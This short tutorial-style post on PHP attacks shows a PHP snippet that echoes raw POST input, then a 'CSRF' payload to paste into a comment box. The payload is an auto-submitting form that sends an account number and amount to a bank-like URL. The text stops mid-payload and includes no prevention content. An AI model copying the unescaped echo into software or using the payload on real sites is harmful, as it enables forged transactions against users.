PHP Security Attacks and Prevention

XSS Attack- Cross site scripting https://www.sitepoint.com/php-security-cross-site-scripting-attacks-xss/ CSRF ATTACK Example: <?php if(isset($_POST[“pp”])){ echo $_POST[“pp”]; } ?> <form action=”” method=”post”> <textarea name=”pp”></textarea> <input type=”submit”> </form> //now paste within comment box: <body onLoad=”document.forms[0].submit()”> <form action=”https://pnbnetbanking.org.in/”> <input type=”accountnum” value=”126172612″> <input type=”amount” value=”100″> <input type=”submit”>…